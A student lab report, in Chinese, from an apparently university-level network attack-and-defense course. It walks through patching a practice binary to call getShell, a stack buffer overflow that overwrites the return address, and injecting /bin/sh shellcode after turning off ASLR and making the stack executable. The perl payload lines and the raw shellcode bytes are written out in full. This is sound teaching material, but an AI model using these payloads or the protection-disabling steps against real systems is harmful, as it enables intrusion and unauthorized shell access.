2018-2019-2 《网络对抗技术》Exp1 PC平台逆向破解 Week3 20165233

Exp1 PC平台逆向破解

实验内容

一、基础知识点

NOP, JNE, JE, JMP, CMP汇编指令的机器码

  • NOP指令即“空指令”,执行到NOP指令时,CPU什么也不做,机器码是90;

  • JNE即条件转移指令,如果不相等则跳转,机器码是75;

  • JE即条件转移指令,如果相等则跳转,机器码是74;

  • JMP即无条件转移指令。段内直接短转Jmp short,机器码是EB; 段内直接近转移Jmp near,机器码是E9; 段内间接转移 Jmp word,机器码是FF; 段间直接(远)转移Jmp far,机器码是EA;

  • CMP:比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果。

二、实验步骤

实验点一:直接修改程序机器指令,改变程序执行流程

  • 使用objdump -d pwn5233 | morepwn5233进行反汇编,来查看汇编代码。

  • 通过汇编代码可知,main函数会调用foo函数,且foo函数的首地址为0x08048491。为了实现直接跳转到getShell函数的目的,则需将此处地址修改为getShell函数的首地址0x0804847d

  • 分析完方法之后,实施修改。利用vi pwn5233打开pwn5233对其进行编辑。首先通过:%!xxd将其转化为十六进制数,方便进行修改。

  • 通过/e8 d7即可筛选至修改位置。

  • 先按回车键,再按r进行替换修改。通过计算得知getShell函数的首地址对应的十六进制后两位是c3。修改完成后按esc,再通过:%!xxd -r将文件变回原本的格式,最后:wq进行保存退出。文件修改完毕。

  • 输入./pwn5233运行修改后的文件,可以得到shell提示符。

实验点二:通过构造输入参数,造成BOF攻击,改变程序执行流

  • 使用gdb对pwn5233_2进行调试,测试会产生溢出的参数大小,从而确认输入字符串哪几个字符会覆盖到返回地址。

  • 当输入字符串很长时,gdb提示段错误,此时说明由于字符串的一部分覆盖到了返回地址,因此foo函数返回到对应的地址时,地址不存在,所以报错。

  • 如果输入1111111122222222333333334444444412345678时,段错误返回地址是0x34333231,即4321对应的ASCII码,所以说明该部分对应返回地址的位置。所以分析可得,只要用getShell函数的返回地址替代,就可以跳转到getShell函数,pwn5233_2就会运行getShell。

  • 由于是小端字节序,所以输入时,应注意地址字段的顺序。perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input构造input输入文件。通过xxd input查看文件是否是想要的字符串。

  • (cat input; cat) | ./pwn1将构造好的字符串输入给pwn5233_2。此时BOF攻击成功。

实验点三:注入Shellcode并执行

  • 使用apt-get install execstack命令安装execstack

  • 使用如下指令进行配置:
execstack -s pwn1

execstack -q pwn1

more /proc/sys/kernel/randomize_va_space

echo "0" > /proc/sys/kernel/randomize_va_space

more /proc/sys/kernel/randomize_va_space

配置过程如下图所示:

  • 使用perl -e 'print "A" x 32;print "\x04\x03\x02\x01\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode进行注入,前面通过32个A来填满缓冲区buf,\x04\x03\x02\x01为返回地址处预留,之后对其进行修改。下面来寻找这个返回地址。

  • (cat input_shellcode;cat) | ./pwn5233_2输入一个终端,按回车后,等待。

  • 重新打开另一个终端

    • ps -ef | grep pwn5233_2查看端口号。

    • 进入gdb进行调试,attach 2638

  • disassemble foo进行反汇编,通过设置断点,来查看注入buf的内存地址。此时可知返回地址为0x080484ae,在此处break *0x080484ae设置断点。

  • c继续执行,此时回到第一个终端,敲击回车继续执行。再返回第二个终端,通过info r esp查找返回地址为0xffffd2ec

  • x/16x 0xffffd2ec查看其存放的内容,由图可知0x01020304为返回地址存放的位置。根据构造的shellcode可知,shellcode的地址就在这之后,为0xffffd2f0

  • 回到第一个终端,再次输入(cat input_shellcode;cat) | ./pwn5233_2,攻击成功。

实验中遇到的问题

1、运行pwn5233时告诉我许可被拒绝?

  • 更改权限chmod +x pwn5233即可解决。

2、最后一个构造shellcode的实验中,攻击成功后,我通过mkdir mushroom.txt新建了一个文本文件成功,但是无法删除?

  • 目前这个问题还木太会解决。

实验收获与感想

本次实验过程中,对于整个原理比较清楚的理解了。通过分析返回地址的位置,从而将要跳转的getshell函数或者是要注入的shellcode的返回地址都成功替换,并且跳转。在实验过程中,遇到一些小问题,比如文件执行权限不够的问题,也能够通过以前学过的知识很快的解决。但是这次实验的不足之处是:如果通过自己独立写出shellcode恐怕就很有难度了。实验内容完全映射到老师上课讲解的内容,利用老师的那个栈的图,结合实验,也更加清楚的掌握了BOF攻击的过程。

什么是漏洞?漏洞有什么危害?

漏洞就是在硬件、软件等方面存在安全伤的缺陷,很容易受到恶意攻击的入口。漏洞的危害:由于受到恶意攻击从而导致信息、数据、机密等的丢失;使用户的计算机等设备上的数据进行恶意篡改,无法正常使用设备。

posted @ 2019-03-13 11:09  minchan0624  阅读(190)  评论(0编辑  收藏  举报